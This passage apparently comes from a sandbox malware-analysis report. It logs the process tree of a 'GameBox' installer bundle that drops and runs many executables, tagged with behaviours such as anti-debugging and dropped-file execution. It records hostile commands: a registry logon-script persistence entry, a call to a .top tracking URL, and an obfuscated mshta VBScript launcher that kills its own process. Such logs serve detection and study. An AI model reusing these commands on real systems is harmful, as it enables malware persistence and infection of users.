C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-NFKP6.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-NFKP6.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629318062 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"6⤵PID:2476
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet3⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:1012 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629318062 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"4⤵PID:5980
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent3⤵
- Executes dropped EXE
PID:1624 -
C:\Users\Admin\AppData\Local\Temp\is-RKG1O.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-RKG1O.tmp\Inlog.tmp" /SL5="$20240,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent4⤵PID:2204
-
C:\Users\Admin\AppData\Local\Temp\is-IGT80.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-IGT80.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7215⤵
- Executes dropped EXE
PID:1304 -
C:\Users\Admin\AppData\Local\Temp\is-O4U92.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-O4U92.tmp\Setup.tmp" /SL5="$2058E,17367866,721408,C:\Users\Admin\AppData\Local\Temp\is-IGT80.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7216⤵PID:6596
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-BKLNG.tmp\{app}\microsoft.cab -F:* %ProgramData%7⤵PID:4532
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-BKLNG.tmp\{app}\microsoft.cab -F:* C:\ProgramData8⤵
- Drops file in Windows directory
PID:5900
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f7⤵PID:6692
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f8⤵PID:700
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7217⤵PID:5408
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=7218⤵PID:4892
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffde8e946f8,0x7ffde8e94708,0x7ffde8e947189⤵PID:5688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:29⤵PID:6936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:39⤵PID:5724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2760 /prefetch:89⤵PID:6916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:19⤵PID:6620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:19⤵PID:6056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4480 /prefetch:19⤵PID:2356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2124 /prefetch:19⤵PID:6528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:19⤵PID:3288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:19⤵PID:2812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:19⤵PID:4340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5616 /prefetch:89⤵PID:7132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5616 /prefetch:89⤵PID:1824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1860 /prefetch:19⤵
- Suspicious use of SetThreadContext
PID:2740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5976 /prefetch:19⤵PID:3036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6100 /prefetch:29⤵PID:2628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1800 /prefetch:19⤵PID:6624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3732 /prefetch:19⤵PID:6660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6164 /prefetch:19⤵PID:2804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6168 /prefetch:19⤵PID:5096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:19⤵PID:6060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:19⤵PID:3256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=1644 /prefetch:89⤵PID:4048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7148 /prefetch:19⤵PID:7012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:19⤵PID:2180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6360 /prefetch:19⤵PID:3932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1744 /prefetch:19⤵PID:1976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7308 /prefetch:19⤵PID:4868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:19⤵PID:4024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4500 /prefetch:19⤵PID:6220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4656 /prefetch:19⤵PID:6540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:19⤵PID:4156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1652 /prefetch:19⤵PID:6332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,3244493702397764327,6330239531552587789,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4476 /prefetch:19⤵PID:5840
-
-
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"7⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1208
-
-
C:\Users\Admin\AppData\Local\Temp\is-BKLNG.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-BKLNG.tmp\{app}\vdi_compiler"7⤵PID:4532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 2928⤵
- Program crash
PID:7092
-
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"3⤵
- Executes dropped EXE
PID:5332 -
C:\Users\Admin\AppData\Roaming\7179660.exe"C:\Users\Admin\AppData\Roaming\7179660.exe"4⤵
- Executes dropped EXE
PID:4088 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4088 -s 23685⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:4696
-
-
-
C:\Users\Admin\AppData\Roaming\4283430.exe"C:\Users\Admin\AppData\Roaming\4283430.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:1044
-
-
C:\Users\Admin\AppData\Roaming\4117862.exe"C:\Users\Admin\AppData\Roaming\4117862.exe"4⤵
- Executes dropped EXE
PID:5780
-
-
C:\Users\Admin\AppData\Roaming\4231225.exe"C:\Users\Admin\AppData\Roaming\4231225.exe"4⤵
- Executes dropped EXE
PID:1380
-
-
C:\Users\Admin\AppData\Roaming\7939085.exe"C:\Users\Admin\AppData\Roaming\7939085.exe"4⤵PID:3016
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 24445⤵
- Program crash
PID:4940
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"3⤵
- Executes dropped EXE
PID:5472 -
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q4⤵
- Executes dropped EXE
PID:492 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 492 -s 7805⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5520
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"3⤵
- Executes dropped EXE
PID:5184
-
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"3⤵
- Executes dropped EXE
PID:1880 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1880 -s 19404⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7140
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1416
-
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent3⤵
- Executes dropped EXE
PID:4980
-
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"3⤵PID:5796
-
C:\Users\Admin\Documents\NrJ8VPrrsywgo7KaH8AGZkth.exe"C:\Users\Admin\Documents\NrJ8VPrrsywgo7KaH8AGZkth.exe"4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2188
-
-
C:\Users\Admin\Documents\Mxg27aWazAZzem_QF2HxxGda.exe"C:\Users\Admin\Documents\Mxg27aWazAZzem_QF2HxxGda.exe"4⤵PID:5732
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 3125⤵
- Program crash
PID:4276
-
-
-
C:\Users\Admin\Documents\eZrM2Z1sYqmH9r9XFl8DMw3u.exe"C:\Users\Admin\Documents\eZrM2Z1sYqmH9r9XFl8DMw3u.exe"4⤵PID:6156
-
-
C:\Users\Admin\Documents\1tkQoT03qIz1JI50wGwelPwe.exe"C:\Users\Admin\Documents\1tkQoT03qIz1JI50wGwelPwe.exe"4⤵PID:3992
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 2725⤵
- Program crash
PID:6312
-
-
-
C:\Users\Admin\Documents\dJJgMVSF7xVTQkPsiAq6s7kz.exe"C:\Users\Admin\Documents\dJJgMVSF7xVTQkPsiAq6s7kz.exe"4⤵PID:3808
-
-
C:\Users\Admin\Documents\CYJk52WDeANPDbhBk4geSusV.exe"C:\Users\Admin\Documents\CYJk52WDeANPDbhBk4geSusV.exe"4⤵PID:6476
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6476 -s 2805⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5668
-
-
-
C:\Users\Admin\Documents\ALfI7Q8dC61u_3QHTkMdi6dT.exe"C:\Users\Admin\Documents\ALfI7Q8dC61u_3QHTkMdi6dT.exe"4⤵PID:6248
-
C:\Users\Admin\Documents\ALfI7Q8dC61u_3QHTkMdi6dT.exe"C:\Users\Admin\Documents\ALfI7Q8dC61u_3QHTkMdi6dT.exe" -q5⤵PID:1508
-
-
-
C:\Users\Admin\Documents\skQ8TP36pgcPsp5xJeZL1RFY.exe"C:\Users\Admin\Documents\skQ8TP36pgcPsp5xJeZL1RFY.exe"4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5764
-
-
C:\Users\Admin\Documents\OmGrI9M1EPHnbbAFrUQb0ivH.exe"C:\Users\Admin\Documents\OmGrI9M1EPHnbbAFrUQb0ivH.exe"4⤵PID:4044
-
-
C:\Users\Admin\Documents\XUm6ndFX8RsuLO1SFSwJGgz0.exe"C:\Users\Admin\Documents\XUm6ndFX8RsuLO1SFSwJGgz0.exe"4⤵
- Drops file in Program Files directory
PID:3640
-
-
C:\Users\Admin\Documents\EJHR9QhlxCsUCxUTS4kF0XCw.exe"C:\Users\Admin\Documents\EJHR9QhlxCsUCxUTS4kF0XCw.exe"4⤵PID:5920
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\EJHR9QhlxCsUCxUTS4kF0XCw.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\EJHR9QhlxCsUCxUTS4kF0XCw.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )5⤵PID:6708
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\EJHR9QhlxCsUCxUTS4kF0XCw.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\EJHR9QhlxCsUCxUTS4kF0XCw.exe" ) do taskkill -f -iM "%~NxA"6⤵PID:6072
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "EJHR9QhlxCsUCxUTS4kF0XCw.exe"7⤵
- Kills process with taskkill
PID:3384
-
-
-
-
-
C:\Users\Admin\Documents\Ac54ZzAMsPeMTxiK2HvyLhjG.exe"C:\Users\Admin\Documents\Ac54ZzAMsPeMTxiK2HvyLhjG.exe"4⤵PID:5360
-
C:\Users\Admin\Documents\Ac54ZzAMsPeMTxiK2HvyLhjG.exeC:\Users\Admin\Documents\Ac54ZzAMsPeMTxiK2HvyLhjG.exe5⤵PID:6532
-
-
-
C:\Users\Admin\Documents\PdKkWB5ixNBNfAwbka00dwxE.exe"C:\Users\Admin\Documents\PdKkWB5ixNBNfAwbka00dwxE.exe"4⤵PID:2740
-
C:\Users\Admin\Documents\PdKkWB5ixNBNfAwbka00dwxE.exeC:\Users\Admin\Documents\PdKkWB5ixNBNfAwbka00dwxE.exe5⤵PID:6336
-
-
-
C:\Users\Admin\Documents\FTgilKL7pUnnadmfGMsNSWbk.exe"C:\Users\Admin\Documents\FTgilKL7pUnnadmfGMsNSWbk.exe"4⤵PID:6120
-
-
C:\Users\Admin\Documents\_uTsQfTNLHJzGiTq5uM9a45f.exe"C:\Users\Admin\Documents\_uTsQfTNLHJzGiTq5uM9a45f.exe"4⤵
- Suspicious use of SetThreadContext
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3068 -
C:\Users\Admin\Documents\_uTsQfTNLHJzGiTq5uM9a45f.exe"C:\Users\Admin\Documents\_uTsQfTNLHJzGiTq5uM9a45f.exe"5⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7008
-
-
-
C:\Users\Admin\Documents\CnLHBrZeDyK490nCbtRGugnc.exe"C:\Users\Admin\Documents\CnLHBrZeDyK490nCbtRGugnc.exe"4⤵PID:2012
-
